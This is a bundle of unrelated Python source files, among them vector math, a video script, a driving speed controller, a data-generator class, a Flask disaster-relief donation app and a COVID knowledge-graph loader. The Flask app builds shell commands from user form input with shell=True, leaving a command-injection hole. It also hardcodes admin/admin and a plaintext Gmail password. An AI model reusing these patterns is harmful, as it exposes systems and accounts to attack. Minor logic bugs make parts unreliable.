"""
return (self.x**2 + self.y**2 + self.z**2)**0.5
@property
def normalise(self):
"""Returns the normalised vector of this vector.
:return: A codirectional vector of length 1.
:rtype: Vector3D
:Example:
.. code-block:: python
>>> v = Vector3D(3,0,0)
>>> result = v.normalise
>>> print(result)
Vector3D(1,0)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
"""
l=self.length
return Vector3D(self.x/l,
self.y/l,
self.z/l)
def triple_product(self,vector1,vector2):
"""Returns the triple product of this vector and 2 supplied vectors.
:param vector1: A 3D vector.
:type vector1: Vector3D
:param vector2: A 3D vector.
:type vector2: Vector3D
:return: The triple product of the three vectors.
The result is equal to the volume of the parallelepiped (3D equivalent of a parallelogram).
The result is equal to six times the volume of the tetrahedron (3D shape with 4 vertices).
:rtype: float
:Example:
.. code-block:: python
>>> v1 = Vector3D(1,0,0)
>>> v2 = Vector3D(0,1,0)
>>> v3 = Vector3D(0,0,1)
>>> result = v1.triple_product(v2,v3)
>>> print(result)
1
.. seealso:: `<https://geomalgorithms.com/vector_products.html#3D-Triple-Product>`_
"""
return self.dot(vector1.cross_product(vector2))
@property
def x(self):
"""The x coordinate of the vector.
:rtype: float
"""
return self._x
@property
def y(self):
"""The y coordinate of the vector.
:rtype: float
"""
return self._y
@property
def z(self):
"""The z coordinate of the vector.
:rtype: float
"""
return self._z
|
import glob
from moviepy.editor import *
images = glob.glob(r'/home/z1143165/video-GAN/output_networks/jelito3d_batchsize8/jelito3d_batchsize8_s8_i200000_interpolations/?_?/*')
images = sorted(images)
print('generating')
for img in images:
print(img)
clip = ImageSequenceClip(images, fps=30)
print(clip.duration)
print('saving')
clip.write_videofile("0-1-2-3.mp4", fps=30, audio=False)
|
import numpy as np
import time
from common.params import Params
from cereal import log
from common.realtime import sec_since_boot
from selfdrive.controls.lib.speed_smoother import speed_smoother
_LON_MPC_STEP = 0.2 # Time stemp of longitudinal control (5 Hz)
_MIN_ADAPTING_BRAKE_ACC = -1.5 # Minimum acceleration allowed when adapting to lower speed limit.
_MIN_ADAPTING_BRAKE_JERK = -1.0 # Minimum jerk allowed when adapting to lower speed limit.
_SPEED_OFFSET_TH = -3.0 # m/s Maximum offset between speed limit and current speed for adapting state.
_LIMIT_ADAPT_ACC = -1.0 # Ideal acceleration for the adapting (braking) phase when approaching speed limits.
_MIN_SPEED_LIMIT = 8.33 # m/s, Minimum speed limit to provide as solution.
_MAX_MAP_DATA_AGE = 10.0 # s Maximum time to hold to map data, then consider it invalid.
_DEBUG = False
TurnSpeedControlState = log.ControlsState.SpeedLimitControlState
def _debug(msg):
if not _DEBUG:
return
print(msg)
def _description_for_state(turn_speed_control_state):
if turn_speed_control_state == TurnSpeedControlState.inactive:
return 'INACTIVE'
if turn_speed_control_state == TurnSpeedControlState.adapting:
return 'ADAPTING'
if turn_speed_control_state == TurnSpeedControlState.active:
return 'ACTIVE'
class TurnSpeedController():
def __init__(self):
self._params = Params()
self._last_params_update = 0.0
self._is_enabled = self._params.get("TurnSpeedControl", encoding='utf8') == "1"
self._op_enabled = False
self._active_jerk_limits = [0.0, 0.0]
self._active_accel_limits = [0.0, 0.0]
self._adapting_jerk_limits = [_MIN_ADAPTING_BRAKE_JERK, 1.0]
self._v_ego = 0.0
self._a_ego = 0.0
self._v_offset = 0.0
self._speed_limit = 0.0
self._distance = 0.0
self._turn_sign = 0
self._state = TurnSpeedControlState.inactive
self._next_speed_limit_prev = 0.
self._adapting_cycles = 0
self._adapting_time = 0.
self.v_turn_limit = 0.0
self.a_turn_limit = 0.0
self.v_turn_limit_future = 0.0
@property
def state(self):
return self._state
@state.setter
def state(self, value):
if value != self._state:
_debug(f'Turn Speed Controller state: {_description_for_state(value)}')
if value == TurnSpeedControlState.adapting:
self._adapting_cycles = 0 # Reset adapting state cycle count when entereing state.
# Adapting time must be calculated at the moment we enter adapting state.
self._adapting_time = self._v_offset / _LIMIT_ADAPT_ACC
self._state = value
@property
def is_active(self):
return self.state > TurnSpeedControlState.tempInactive
@property
def speed_limit(self):
return max(self._speed_limit, _MIN_SPEED_LIMIT) if self._speed_limit > 0. else 0.
@property
def distance(self):
return self._distance
@property
def turn_sign(self):
return self._turn_sign
def _get_limit_from_map_data(self, sm):
"""Provides the speed limit, distance and turn sign to it for turns based on map data.
"""
# Ignore if no live map data
sock = 'liveMapData'
if sm.logMonoTime[sock] is None:
_debug('TS: No map data for turn speed limit')
return 0., 0., 0
# Load limits from map_data
map_data = sm[sock]
speed_limit = 0.
turn_sign = map_data.turnSpeedLimitSign if map_data.turnSpeedLimitValid else 0
next_speed_limit = map_data.turnSpeedLimitAhead if map_data.turnSpeedLimitAheadValid else 0.
next_turn_sign = map_data.turnSpeedLimitAheadSign if map_data.turnSpeedLimitAheadValid else 0
# Calculate the age of the gps fix. Ignore if too old.
gps_fix_age = time.time() - map_data.lastGpsTimestamp * 1e-3
if gps_fix_age > _MAX_MAP_DATA_AGE:
_debug(f'TS: Ignoring map data as is too old. Age: {gps_fix_age}')
return 0., 0., 0
# Ensure current speed limit is considered only if we are inside the section.
if map_data.turnSpeedLimitValid and self._v_ego > 0.:
speed_limit_end_time = (map_data.turnSpeedLimitEndDistance / self._v_ego) - gps_fix_age
if speed_limit_end_time > 0.:
speed_limit = map_data.turnSpeedLimit
# When we have no ahead speed limit to consider or it is greater than current speed limit
# or car has stopped, then provide current value and reset tracking.
if next_speed_limit == 0. or self._v_ego <= 0. or (speed_limit > 0 and next_speed_limit > speed_limit):
self._next_speed_limit_prev = 0.
return speed_limit, 0., turn_sign
# Calculate the distance to the next speed limit ahead corrected by gps_fix_age
distance_since_fix = self._v_ego * gps_fix_age
distance_to_limit_ahead = max(0., map_data.turnSpeedLimitAheadDistance - distance_since_fix)
# When we have a next_speed_limit value that has not changed from a provided next speed limit value
# in previous resolutions, we keep providing it along with the udpated distance to it.
if next_speed_limit == self._next_speed_limit_prev:
return next_speed_limit, distance_to_limit_ahead, next_turn_sign
# Reset tracking
self._next_speed_limit_prev = 0.
# Calculated the time needed to adapt to the new limit and the corresponding distance.
adapt_time = (max(next_speed_limit, _MIN_SPEED_LIMIT) - self._v_ego) / _LIMIT_ADAPT_ACC
adapt_distance = self._v_ego * adapt_time + 0.5 * _LIMIT_ADAPT_ACC * adapt_time**2
# When we detect we are close enough, we provide the next limit value and track it.
if distance_to_limit_ahead <= adapt_distance:
self._next_speed_limit_prev = next_speed_limit
return next_speed_limit, distance_to_limit_ahead, next_turn_sign
# Otherwise we just provide the calculated speed_limit
return speed_limit, 0., turn_sign
def _update_params(self):
time = sec_since_boot()
if time > self._last_params_update + 5.0:
self._is_enabled = self._params.get("TurnSpeedControl", encoding='utf8') == "1"
self._last_params_update = time
def _update_calculations(self):
# Update current velocity offset (error)
self._v_offset = self.speed_limit - self._v_ego
def _state_transition(self):
# In any case, if op is disabled, or speed limit control is disabled
# or the reported speed limit is 0, deactivate.
if not self._op_enabled or not self._is_enabled or self.speed_limit == 0.:
self.state = TurnSpeedControlState.inactive
return
# inactive
if self.state == TurnSpeedControlState.inactive:
# If the limit speed offset is negative (i.e. reduce speed) and lower than threshold
# we go to adapting state to quickly reduce speed, otherwise we go directly to active
if self._v_offset < _SPEED_OFFSET_TH:
self.state = TurnSpeedControlState.adapting
else:
self.state = TurnSpeedControlState.active
# adapting
elif self.state == TurnSpeedControlState.adapting:
self._adapting_cycles += 1
# Go to active once the speed offset is over threshold.
if self._v_offset >= _SPEED_OFFSET_TH:
self.state = TurnSpeedControlState.active
# active
elif self.state == TurnSpeedControlState.active:
# Go to adapting if the speed offset goes below threshold.
if self._v_offset < _SPEED_OFFSET_TH:
self.state = TurnSpeedControlState.adapting
def _update_solution(self):
# inactive
if self.state == TurnSpeedControlState.inactive:
# Preserve values
self.v_turn_limit = self._v_ego
self.a_turn_limit = self._a_ego
self.v_turn_limit_future = self._v_ego
# adapting
elif self.state == TurnSpeedControlState.adapting:
# Calculate to adapt speed on target time.
adapting_time = max(self._adapting_time - self._adapting_cycles * _LON_MPC_STEP, 1.0) # min adapt time 1 sec.
a_target = (self.speed_limit - self._v_ego) / adapting_time
# smooth out acceleration using jerk limits.
j_limits = np.array(self._adapting_jerk_limits)
a_limits = self._a_ego + j_limits * _LON_MPC_STEP
a_target = max(min(a_target, a_limits[1]), a_limits[0])
# calculate the solution values
self.a_turn_limit = max(a_target, _MIN_ADAPTING_BRAKE_ACC) # acceleration in next Longitudinal control step.
self.v_turn_limit = self._v_ego + self.a_turn_limit * _LON_MPC_STEP # speed in next Longitudinal control step.
self.v_turn_limit_future = max(self._v_ego + self.a_turn_limit * 4., self.speed_limit) # speed in 4 seconds.
# active
elif self.state == TurnSpeedControlState.active:
# Calculate following same cruise logic in planner.py
self.v_turn_limit, self.a_turn_limit = \
speed_smoother(self._v_ego, self._a_ego, self.speed_limit, self._active_accel_limits[1],
self._active_accel_limits[0], self._active_jerk_limits[1], self._active_jerk_limits[0],
_LON_MPC_STEP)
self.v_turn_limit = max(self.v_turn_limit, 0.)
self.v_turn_limit_future = self.speed_limit
def update(self, enabled, v_ego, a_ego, sm, accel_limits, jerk_limits):
self._op_enabled = enabled
self._v_ego = v_ego
self._a_ego = a_ego
self._active_accel_limits = accel_limits
self._active_jerk_limits = jerk_limits
# Get the speed limit from Map Data
self._speed_limit, self._distance, self._turn_sign = self._get_limit_from_map_data(sm)
self._update_params()
self._update_calculations()
self._state_transition()
self._update_solution()
def deactivate(self):
self.state = TurnSpeedControlState.inactive
|
import textwrap
from bidict import bidict
from itertools import count
from .logging import logger
from .primitive_generators import PrimitiveGenerator
from .derived_generators import Apply, GetAttribute, Lookup, SelectOneDerived
__all__ = ['SpawnContext']
class NoExistingSpawn(Exception):
"""
Custom exception
"""
class SpawnContext:
def __init__(self):
self.templates = bidict() # mapping {name -> field_generator_template}
self.spawns = {} # mapping {name -> field_generator}
self.anonymous_spawns = [] # names of anonymously spawned generators
self.cnt_anonymous = count()
def __repr__(self):
return textwrap.dedent(f"""
<SpawnContextCG:
templates: {dict(self.templates)}
spawns: {dict(self.spawns)}
anonymous: {self.anonymous_spawns}
>""")
@property
def named_spawns(self):
return {name: g for (name, g) in self.spawns.items() if name not in self.anonymous_spawns}
def get_existing_spawn(self, g_tpl):
try:
existing_name = self.templates.inv[g_tpl]
return self.spawns[existing_name]
except KeyError:
logger.debug(f"No existing spawn for {g_tpl}")
raise NoExistingSpawn()
def spawn_template(self, g_tpl, *, name):
if name is None:
try:
name = self.templates.inv[g_tpl]
except KeyError:
name = f'ANONYMOUS_ANONYMOUS_ANONYMOUS_{next(self.cnt_anonymous)}'
self.anonymous_spawns.append(name)
logger.debug(f"Found anonymous field generator template: {g_tpl}")
try:
self.spawns[name] = self.get_existing_spawn(g_tpl)
except NoExistingSpawn:
if isinstance(g_tpl, PrimitiveGenerator):
self.templates[name] = g_tpl
self.spawns[name] = g_tpl.spawn()
elif isinstance(g_tpl, SelectOneDerived):
new_parent = self.spawn_template(g_tpl.parent, name=None)
self.templates[name] = g_tpl
self.spawns[name] = SelectOneDerived(new_parent)
elif isinstance(g_tpl, GetAttribute):
new_parent = self.spawn_template(g_tpl.parent, name=None)
self.templates[name] = g_tpl
self.spawns[name] = GetAttribute(new_parent, name=g_tpl.name)
elif isinstance(g_tpl, Lookup):
new_parent = self.spawn_template(g_tpl.parent, name=None)
self.templates[name] = g_tpl
self.spawns[name] = Lookup(new_parent, mapping=g_tpl.mapping)
elif isinstance(g_tpl, Apply):
new_arg_gens = []
for gen in g_tpl.func_arg_gens_orig.arg_gens:
new_arg_gens.append(self.spawn_template(gen, name=None))
new_kwarg_gens = {}
for gen_name, gen in g_tpl.func_arg_gens_orig.kwarg_gens.items():
new_kwarg_gens[gen_name] = self.spawn_template(gen, name=None)
self.templates[name] = g_tpl
self.spawns[name] = Apply(g_tpl.func, *new_arg_gens, **new_kwarg_gens)
else:
raise NotImplementedError(f'g_tpl: {g_tpl}')
# Set tohu_name for nicer debugging
if name.startswith('ANONYMOUS_ANONYMOUS_ANONYMOUS_'):
self.spawns[name].set_tohu_name(f'anonymous_{g_tpl.tohu_id}')
else:
self.spawns[name].set_tohu_name(name)
return self.spawns[name]
|
from flask import Flask, flash, redirect, render_template, request, session, abort,url_for
import os,jsonlines
import matplotlib.pyplot as plt
import io,smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
# import encoders
import subprocess
import graph
import base64,json
import datetime,time
from passlib.hash import sha256_crypt
import warnings
warnings.filterwarnings(action="ignore")
import pandas as pd
from sklearn.model_selection import train_test_split #uses only some part of data & is time saving
from sklearn.linear_model import LogisticRegression
import nlpCode
app = Flask(__name__)
@app.route('/donation',methods=["POST","GET"])
def donationFunction():
if request.method == "POST":
block = request.form.to_dict()
block.pop('cvv')
print(block)
timestamp = time.time()
block["timestamp"]=timestamp
prev_hash="0"
with jsonlines.open('static/donation.jsonl') as reader:
for obj in reader:
# print(type(obj))
if obj:
print((obj)["block_hash"])
prev_hash=(obj)["block_hash"]
block["prev_hash"]=prev_hash
block_hash=blockhash(block,prev_hash)
block["block_hash"]=block_hash
with jsonlines.open('static/donation.jsonl', mode='a') as writer:
writer.write(block)
dis={"e":1}
item={"food":1,"clothes":2,"water":3,"med":4}
subprocess.call('python3 algo.py '+ str(block["amount"])+' '+str(item[block["item"]])+ ' '+block["aadhar"], shell=True)
# print( 'Block<hash: {}, prev_hash: {}, messages: {}, time: {}>'.format(self.hash, self.prev_hash, len(self.messages), self.timestamp))
return render_template('donation.html')
@app.route('/viewDonation')
def viewDonationFunction():
donations= []
with jsonlines.open('static/donation.jsonl') as reader:
print(reader)
for obj in reader:
# print(type(obj))
donations.append(obj)
# print(donations)
return render_template('viewDonation.html',donations=donations)
@app.route('/viewExpenditure')
def viewExpenditureFunction():
expenditures = []
with jsonlines.open('static/expenditure.jsonl') as reader:
print(reader)
for obj in reader:
# print(type(obj))
expenditures.append(obj)
# print(donations)
return render_template('viewExpenditure.html', expenditures=expenditures)
@app.route('/viewStatus')
def viewStatus():
statuses = []
with jsonlines.open('static/citizen.jsonl') as reader:
print(reader)
for obj in reader:
# print(type(obj))
statuses.append(obj)
# print(donations)
return render_template('viewStatus.html', statuses=statuses)
@app.route('/displayDetails', methods=["POST", "GET"])
def displayDetails():
details = []
with jsonlines.open('static/govt.jsonl') as reader:
print(reader)
for obj in reader:
# print(type(obj))
details.append(obj)
# print(donations)
return render_template('displayDetails.html', details=details)
@app.route('/viewDisasters', methods=["POST", "GET"])
def viewDisasters():
disasters = []
with jsonlines.open('static/disaster.jsonl') as reader:
print(reader)
for obj in reader:
# print(type(obj))
disasters.append(obj)
# print(donations)
return render_template('viewDisaster.html', disasters=disasters)
@app.route('/citizen_rescue', methods=["POST", "GET"])
def citizen_rescue():
if request.method == "POST":
reader={}
result = request.form["aadhar"]
with jsonlines.open('static/citizen.jsonl',mode='r') as reader :
for obj in reader:
if obj["aadhar"]==result:
obj["statusLiving"]="True" if request.form["status"]=="yes" else "False"
sendmail(obj["email"],"Person has been marked Safe","This message of the disaster relief management system please do not reply to this mail.","","")
writer = jsonlines.open('static/citizen.jsonl', mode='a')
writer.write(obj)
writer.close()
break
# print(type(obj))
# print(donations)
return render_template('citizen_rescue.html')
@app.route('/login', methods=["POST", "GET"])
def login():
if request.method == "POST":
if request.form["username"] == 'admin' and request.form["password"] == "admin":
session['user'] = 'admin'
return redirect(url_for('govtView'))
message = "Wrong Creds"
return render_template('login.html', message="Wrong Creds")
return render_template('login.html')
@app.route('/logout', methods=["POST", "GET"])
def logout():
session.pop('user',None)
return redirect(url_for('login'))
@app.route('/govtView',methods=["POST","GET"])
def govtView():
if session['user'] == 'admin':
if request.method=="POST":
dic=nlpCode(request.form["disaster"])
return render_template('display.html',dic=dic)
return render_template('govtView.html')
else:
message= "Wrong credentials"
return render_template('login.html',message=message)
@app.route('/assignFunds', methods=["POST", "GET"])
def assignFunds():
if request.method == "POST":
deathtoll= request.form["death_toll"]
mag=request.form["mag"]
filename= 'data.csv'
hnames= ['deathtoll','mag','req_fund']
dataframe=pd.read_csv(filename,names=hnames)
array= dataframe.values
dataframe.plot(x ='deathtoll', y='req_fund', kind = 'line')
#plt.show()
#separate array into input and output components
x=array[:,0:2] #input column
y=array[:,2] #output column
test_data_size=0.1 #hides 33% data from machine so that it will be used for testing
#seed=4
x_train,x_test,y_train,y_test= train_test_split(x,y,test_size=test_data_size) #,random_state=seed)
model= LogisticRegression()
model.fit(x_train,y_train)
r=model.predict([[int(deathtoll),float(mag)]])
# plt.plot(3500,5000,marker='o',markerfacecolor='red',markersize=7,
# linestyle='dashed',color='blue')
print("enter")
# p = subprocess.Popen(["python3","graph.py","5000","50000"], stdout=subprocess.PIPE)
if deathtoll and r:
subprocess.call('python3 graph.py '+ str(deathtoll)+' '+str(r), shell=True)
# subprocess.call('python3 graph.py' , shell=True)
# graph.blah()
# print p.communicate()
# plt.show()
disasters = []
with jsonlines.open('static/disaster.jsonl') as reader:
print(reader)
for obj in reader:
# print(type(obj))
# print(donations)
disasters.append(obj)
return render_template('assignFunds.html', disasters=disasters)
@app.route('/updateEvent', methods=["POST", "GET"])
def updateEvent():
disasters = []
with jsonlines.open('static/disaster.jsonl') as reader:
print(reader)
for obj in reader:
disasters.append(obj)
if request.method == "POST":
block = request.form.to_dict()
print(block)
prev_hash = "0"
with jsonlines.open('static/disaster.jsonl') as reader:
for obj in reader:
# print(type(obj))
if obj:
print((obj)["block_hash"])
prev_hash = (obj)["block_hash"]
block["prev_hash"] = prev_hash
block_hash = blockhash(block, prev_hash)
block["block_hash"] = block_hash
with jsonlines.open('static/disaster.jsonl', mode='a') as writer:
writer.write(block)
# print( 'Block<hash: {}, prev_hash: {}, messages: {}, time: {}>'.format(self.hash, self.prev_hash, len(self.messages), self.timestamp))
return render_template('updateEvent.html', disasters=disasters)
return render_template('updateEvent.html', disasters=disasters)
@app.route('/expenditure', methods=["POST", "GET"])
def expenditure():
expenditures = []
if request.method == "POST":
block = request.form.to_dict()
print(block)
prev_hash = "0"
with jsonlines.open('static/expenditure.jsonl') as reader:
for obj in reader:
# print(type(obj))
if obj:
print((obj)["block_hash"])
prev_hash = (obj)["block_hash"]
block["prev_hash"] = prev_hash
block_hash = blockhash(block, prev_hash)
block["block_hash"] = block_hash
with jsonlines.open('static/expenditure.jsonl', mode='a') as writer:
writer.write(block)
with jsonlines.open('static/expenditure.jsonl') as reader:
print(reader)
for obj in reader:
expenditures.append(obj)
# print( 'Block<hash: {}, prev_hash: {}, messages: {}, time: {}>'.format(self.hash, self.prev_hash, len(self.messages), self.timestamp))
return render_template('expenditure.html', expenditures=expenditures)
return render_template('expenditure.html', expenditures=expenditures)
@app.route('/', methods=["POST", "GET"])
@app.route('/userView', methods=["POST", "GET"])
def userView():
return render_template('userView.html')
def blockhash(values,prev_hash=""):
concat=""
for x in values:
concat+=str(x)
concat+=prev_hash
print(concat)
return(sha256_crypt.hash(concat))
def predict_and_plot():
return render_template('govtView.html')
# sendmail("portalnie@gmail.com","Data Integrity Lost","","")
def sendmail(to,mail_subject,mail_body,mail_attach,filename=""):
fromaddr = "portalnie@gmail.com"
toaddr = to
# instance of MIMEMultipart
msg = MIMEMultipart()
# storing the senders email address
msg['From'] = fromaddr
# storing the receivers email address
msg['To'] = toaddr
# storing the subject
msg['Subject'] = mail_subject
# string to store the body of the mail
body = mail_body
# attach the body with the msg instance
# open the file to be sent
attachment = mail_attach
noattach=1 if attachment else 0
if attachment:
# To change the payload into encoded form
msg.attach(MIMEText(body, 'plain'))
p = MIMEBase('application', 'octet-stream')
p.set_payload((attachment).read())
# encode into base64
encoders.encode_base64(p)
p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
# attach the instance 'p' to instance 'msg'
msg.attach(p)
# creates SMTP session
s = smtplib.SMTP('smtp.gmail.com', 587)
# start TLS for security
s.starttls()
# Authentication, provide account password here
s.login(fromaddr, "portalniewelcome")
# Converts the Multipart msg into a string
text = msg.as_string() if noattach else 'Subject: {}\n\n{}'.format(mail_subject,mail_body)
#if noattach else mail_body
# sending the mail
s.sendmail(fromaddr, toaddr, text)
# terminating the session
s.quit()
def build_graph(sections, colors, personname):
img = io.BytesIO()
labels='Food','Water','Shelter','Medicine' #anticlockwise nomenclature
plt.pie(sections,labels=labels,colors=colors,startangle=90,explode=(0,0,0,0),autopct='%1.2f%%')
# %1 specifies the space between the %sign and the number & %% at the end print the %sign
plt.title(personname+' donation distribution',loc="right")
# plt.show()
plt.savefig(img, format='png')
img.seek(0)
graph_url = base64.b64encode(img.getvalue()).decode()
plt.close()
return 'data:image/png;base64,{}'.format(graph_url)
def build_graph_pre(ra1, r):
filename= 'data.csv'
hnames= ['deathtoll','mag','req_fund']
dataframe=pd.read_csv(filename,names=hnames)
array= dataframe.values
dataframe.plot(x ='deathtoll', y='req_fund', kind = 'line')
img = io.BytesIO()
plt.plot(ra1, r,marker='o',markerfacecolor='red',markersize=7,
linestyle='dashed',color='blue')
plt.savefig(img, format='png')
img.seek(0)
graph_url = base64.b64encode(img.getvalue()).decode()
plt.close()
return 'data:image/png;base64,{}'.format(graph_url)
@app.route('/graphs')
def graphs():
#These coordinates could be stored in DB
sections1=[20,30,20,50]
colors1=['c','g','y','b']
sections2=[80,10,40,50]
colors2=['c','g','y','b']
sections3=[5,15,14,20]
colors3=['c','g','y','b']
graph1_url = build_graph(sections1,colors1,"Ram Prasad")
graph2_url = build_graph(sections2,colors2,"Sai Ayachit")
graph3_url = build_graph(sections3,colors3,"Shithij Rai")
return render_template('graphs.html',
graph1=graph1_url,
graph2=graph2_url,
graph3=graph3_url)
if __name__ == "__main__":
app.secret_key = os.urandom(12)
app.run(debug=True,host='0.0.0.0', port=5555)
|
import os
import logging
import enum
from copy import deepcopy
from Common.utils import LoggingUtil, GetData
from Common.loader_interface import SourceDataLoader
from Common.extractor import Extractor
from Common.node_types import AGGREGATOR_KNOWLEDGE_SOURCES, ORIGINAL_KNOWLEDGE_SOURCE
# the data header columns for both nodes files are:
class NODESDATACOLS(enum.IntEnum):
ID = 0
CATEGORY = 1
NAME = 2
# the data header columns for the SciBites edges file are:
class SBEDGESDATACOLS(enum.IntEnum):
SUBJECT = 0
OBJECT = 1
ENRICHMENT = 5
EFFECTIVE_PUBS = 6
# the data header columns for the SciGraph edges file are:
class SGEDGESDATACOLS(enum.IntEnum):
SUBJECT = 0
OBJECT = 1
ENRICHMENT = 2
EFFECTIVE_PUBS = 3
# the data header columns for covid phenotypes are:
class PHENOTYPESDATACOLS(enum.IntEnum):
PHENOTYPE_NAME = 0
PHENOTYPE_ID = 1
PHENOTYPE_HP_NAME = 2
PHENOTYPE_NOTE = 3
# the data header columns for drug trials:
class TRIALSDATACOLS(enum.IntEnum):
DRUG_ID = 0
PREDICATE = 1
TARGET_ID = 2
COUNT = 3
##############
# Class: cord19 data source loader
#
# Desc: Class that loads/parses the cord19 model data.
##############
class Cord19Loader(SourceDataLoader):
source_id: str = 'Cord19'
provenance_id: str = 'infores:cord19'
def __init__(self, test_mode: bool = False):
"""
constructor
:param test_mode - sets the run into test mode
"""
# call the super
super(SourceDataLoader, self).__init__()
# NOTE 1: The nodes files are not necessary, unless we decide we want the names from them.
# Leaving them set up here just in case we do in the future..
self.scibite_url = 'https://stars.renci.org/var/data_services/cord19/scibite/v6/'
self.scibite_edges_file_name = 'CV19_edges.txt'
# self.scibite_nodes_file_name = 'CV19_nodes.txt'
self.scrigraph_url = 'https://stars.renci.org/var/data_services/cord19/scigraph/v12/'
self.scigraph_edges_file_name = 'pairs.txt'
# self.scigraph_nodes_file_name = 'normalized.txt'
self.related_to_predicate = 'biolink:correlated_with'
self.covid_node_id = 'MONDO:0100096'
self.has_phenotype_predicate = 'RO:0002200'
self.covid_phenotypes_url = 'https://stars.renci.org/var/data_services/cord19/'
self.covid_phenotypes_file_name = 'covid_phenotypes.csv'
self.drug_bank_trials_url = 'https://raw.githubusercontent.com/TranslatorIIPrototypes/CovidDrugBank/master/'
self.drug_bank_trials_file_name = 'trials.txt'
self.data_path: str = os.path.join(os.environ['DATA_SERVICES_STORAGE'], self.source_id, 'source')
if not os.path.exists(self.data_path):
os.mkdir(self.data_path)
self.data_files: list = [self.scibite_edges_file_name,
# self.scibite_nodes_file_name,
self.scigraph_edges_file_name,
# self.scigraph_nodes_file_name,
self.covid_phenotypes_file_name,
self.drug_bank_trials_file_name]
self.test_mode: bool = test_mode
# the final output lists of nodes and edges
self.final_node_list: list = []
self.final_edge_list: list = []
# create a logger
self.logger = LoggingUtil.init_logging("Data_services.cord19.Cord19Loader", level=logging.INFO, line_format='medium', log_file_path=os.environ['DATA_SERVICES_LOGS'])
def get_latest_source_version(self) -> str:
"""
gets the version of the data
:return:
"""
return 'scibite_v6_scigraph_v12'
def get_data(self) -> int:
"""
Gets the cord19 data.
"""
sources_to_pull = [
f'{self.covid_phenotypes_url}{self.covid_phenotypes_file_name}',
# f'{self.scibite_url}{self.scibite_nodes_file_name}',
f'{self.scibite_url}{self.scibite_edges_file_name}',
# f'{self.scrigraph_url}{self.scigraph_nodes_file_name}',
f'{self.scrigraph_url}{self.scigraph_edges_file_name}',
f'{self.drug_bank_trials_url}{self.drug_bank_trials_file_name}'
]
data_puller = GetData()
for source_url in sources_to_pull:
data_puller.pull_via_http(source_url, self.data_path)
return True
def parse_data(self) -> dict:
"""
Parses the data file for graph nodes/edges
:return: ret_val: load_metadata
"""
extractor = Extractor()
"""
# See NOTE 1 above about nodes files
#
# parse the scibites nodes files
for nodes_file_name in [self.scibite_nodes_file_name, self.scigraph_nodes_file_name]:
nodes_file: str = os.path.join(self.data_path, nodes_file_name)
with open(nodes_file, 'r') as fp:
extractor.csv_extract(fp,
lambda line: line[NODESDATACOLS.ID.value], # extract subject id
lambda line: None, # extract object id
lambda line: None, # predicate extractor
lambda line: {'name': line[NODESDATACOLS.NAME.value]}, # subject props
lambda line: {}, # object props
lambda line: {}, # edge props
comment_character=None,
delim='\t',
has_header_row=True)
"""
# parse the scibites edges file
edges_file: str = os.path.join(self.data_path, self.scibite_edges_file_name)
with open(edges_file, 'r') as fp:
extractor.csv_extract(fp,
lambda line: line[SBEDGESDATACOLS.SUBJECT.value].replace('_', ''), # subject id
lambda line: line[SBEDGESDATACOLS.OBJECT.value].replace('_', ''), # object id
lambda line: self.related_to_predicate, # predicate extractor
lambda line: {}, # subject props
lambda line: {}, # object props
lambda line: {'num_publications': float(line[SBEDGESDATACOLS.EFFECTIVE_PUBS.value]),
'enrichment_p': float(line[SBEDGESDATACOLS.ENRICHMENT.value]),
ORIGINAL_KNOWLEDGE_SOURCE: 'infores:cord19-scibite'},#edgeprops
comment_character=None,
delim='\t',
has_header_row=True)
# parse the scigraph edges file
edges_file: str = os.path.join(self.data_path, self.scigraph_edges_file_name)
with open(edges_file, 'r') as fp:
extractor.csv_extract(fp,
lambda line: line[SGEDGESDATACOLS.SUBJECT.value], # subject id
lambda line: line[SGEDGESDATACOLS.OBJECT.value], # object id
lambda line: self.related_to_predicate, # predicate extractor
lambda line: {}, # subject props
lambda line: {}, # object props
lambda line: {'num_publications': float(line[SGEDGESDATACOLS.EFFECTIVE_PUBS.value]),
'enrichment_p': float(line[SGEDGESDATACOLS.ENRICHMENT.value]),
ORIGINAL_KNOWLEDGE_SOURCE: self.provenance_id},#edgeprops
comment_character=None,
delim='\t',
has_header_row=True)
# parse the covid phenotypes file
phenotypes_file: str = os.path.join(self.data_path, self.covid_phenotypes_file_name)
with open(phenotypes_file, 'r') as fp:
extractor.csv_extract(fp,
lambda line: self.covid_node_id, # subject id
lambda line: line[PHENOTYPESDATACOLS.PHENOTYPE_ID.value], # object id
lambda line: self.has_phenotype_predicate, # predicate extractor
lambda line: {}, # subject props
lambda line: {}, # object props
lambda line: {'notes': line[PHENOTYPESDATACOLS.PHENOTYPE_NOTE.value],
ORIGINAL_KNOWLEDGE_SOURCE: self.provenance_id,
AGGREGATOR_KNOWLEDGE_SOURCES: [self.provenance_id]},#edgeprops
comment_character=None,
delim=',',
has_header_row=True)
# parse the drug bank trials file
trials_file: str = os.path.join(self.data_path, self.drug_bank_trials_file_name)
with open(trials_file, 'r') as fp:
extractor.csv_extract(fp,
lambda line: line[TRIALSDATACOLS.DRUG_ID.value], # subject id
lambda line: line[TRIALSDATACOLS.TARGET_ID.value], # object id
lambda line: f'ROBOKOVID:{line[TRIALSDATACOLS.PREDICATE.value]}', # predicate extractor
lambda line: {}, # subject props
lambda line: {}, # object props
lambda line: {'count': line[TRIALSDATACOLS.COUNT.value],
ORIGINAL_KNOWLEDGE_SOURCE: 'infores:drugbank'},#edgeprops
comment_character=None,
delim='\t',
has_header_row=True)
self.final_node_list = extractor.nodes
self.final_edge_list = extractor.edges
# we want to duplicate all the edges attached to the nodes for covid as a disease and SARS-CoV-2 as a taxon
# right now this is:
covid_disease_id = 'MONDO:0100096'
coronavirus_taxon_id = 'NCBITaxon:2697049'
edges_to_add = []
for edge in self.final_edge_list:
new_edge = None
if edge.subjectid == covid_disease_id:
new_edge = deepcopy(edge)
new_edge.subjectid == coronavirus_taxon_id
elif edge.objectid == covid_disease_id:
new_edge = deepcopy(edge)
new_edge.objectid == coronavirus_taxon_id
elif edge.subjectid == coronavirus_taxon_id:
new_edge = deepcopy(edge)
new_edge.subjectid == covid_disease_id
elif edge.objectid == coronavirus_taxon_id:
new_edge = deepcopy(edge)
new_edge.objectid == covid_disease_id
if new_edge and new_edge.subjectid != new_edge.objectid:
edges_to_add.append(new_edge)
self.final_edge_list.extend(edges_to_add)
return extractor.load_metadata
|
# -*- coding: utf-8 -*-
import os
